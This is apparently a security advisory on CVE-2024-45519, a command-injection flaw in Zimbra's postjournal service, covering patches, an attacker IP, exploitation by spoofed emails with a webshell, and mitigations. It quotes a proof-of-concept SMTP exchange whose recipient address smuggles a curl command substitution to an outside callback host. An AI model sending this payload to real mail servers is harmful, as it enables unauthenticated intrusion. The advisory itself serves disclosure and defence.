Key Takeaways

• A critical remote code execution (RCE) vulnerability (CVE-2024-45519) in Zimbra’s postjournal service is under active attack; users are urged to patch immediately.
• A Proof of Concept (PoC) demonstrated that the vulnerability can be exploited with specially crafted emails.
• The postjournal SMTP parsing service is not enabled by default in Zimbra, but as Cyble sensors detect more than 90,000 web-facing Zimbra instances with unpatched earlier vulnerabilities, all Zimbra customers should approach this issue with urgency.

Overview

A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.

The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.

Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.

Patched versions include these versions and newer:

• 9.0.0 Patch 41
• 10.0.9
• 10.1.1
• 8.8.15 Patch 46

One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.

Technical Analysis

Exploitation began after ProjectDiscovery researchers reported a Proof of Concept (PoC) for the vulnerability.

The researchers reversed the postjournal binary and found that there were no calls to execvp or the run_command function. Instead, a direct call to popen was made in the read_maps function, allowing input to be passed without sanitization. The cmd argument passed to popen in double quotes would prevent command injection with simple shell metacharacters, but that control could be bypassed with $() syntax.

The postjournal service was then exploited via port 10027 with the following SMTP commands:

EHLO localhost

MAIL FROM: <[email protected]>

RCPT TO: <“aabbb$(curl${IFS}oast.me)”@mail.domain.com>

DATA

Test message

.

The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:

zmlocalconfig -e postjournal_enabled=true

zmcontrol restart

To enable remote exploit, the researchers found that the mynetworks default configuration included a /20 CIDR range of their public IP address, which could allow the exploit to be performed remotely if the postjournal service is enabled and the attacker is within the allowed network range.

Proofpoint researchers have observed the vulnerability under exploitation, with spoofing emails sent to fake addresses in CC fields to try to get Zimbra servers to parse and execute them as commands. The addresses contained base64 strings that are executed with the sh utility.

Some of the emails used CC’d addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as a string, and if connected, the base64 blobs decode to a command to write a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (see image below).

Once installed, the webshell listens for inbound connections and also has support for command execution via exec or download and execute over a socket connection.

Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:

While CVE-2024-45519 hasn’t been officially reported yet, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.

Recommendations

All Zimbra administrators should:

• Disable postjournal if not needed
• Configure mynetworks to prevent unauthorized access
• Apply the latest security updates directly from Zimbra

Related